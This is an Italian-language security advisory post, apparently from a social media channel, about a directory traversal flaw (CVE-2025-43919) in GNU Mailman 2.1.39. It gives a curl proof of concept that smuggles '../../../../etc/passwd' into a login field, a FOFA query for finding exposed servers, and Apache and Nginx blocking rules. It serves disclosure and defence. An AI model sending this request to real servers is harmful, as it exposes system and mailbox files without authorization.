
Una nuova vulnerabilità è stata scoperta in GNU Mailman 2.1.39, incluso con cPanel/WHM, che consente ad attaccanti remoti non autenticati di leggere file arbitrari sul server tramite una falla di attraversamento delle directory.
È stata scoperta una nuova vulnerabilità in GNU Mailman 2.1.39, in bundle con cPanel/WHM, che consente a utenti remoti non autenticati di leggere file arbitrari sul server tramite un difetto di directory traversal.
📌 Riepilogo della vulnerabilità:
Directory Traversal (Non autenticato)private.py/mailman/private/mailman/etc/passwd, archivi .mbox e configurazioni di Mailman5.8 (Medio)CVE-2025-43919Stato: Nessuna patch ufficiale (Mailman 2.1.x è EOL)
🔥 Prova di concetto:
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman
🧨 Scenari di sfruttamento:
/etc/passwd, configurazioni o file di mailbox🛡️ Mitigazioni:
Bloccare l'accesso a /mailman/private a livello di server web:
<Location "/mailman/private">
Require ip 127.0.0.1
Deny from all
</Location>
Oppure in Nginx:
location /mailman/private {
deny all;
return 403;
}
⬆️ Migrare a Mailman 3.x — 2.x è EOL e manca di protezioni moderne
🔍 FOFA Query : app="Mailman"
📚 Scopri di più, condividi in modo responsabile e mantieni sicura la tua infrastruttura.
🔒 Segui per altri CVE reali, PoC concreti e suggerimenti di hardening: 👉 @cybersecplayground
#bugbounty #infosec #exploit #pentest #cve2025 #directorytraversal #linuxsecurity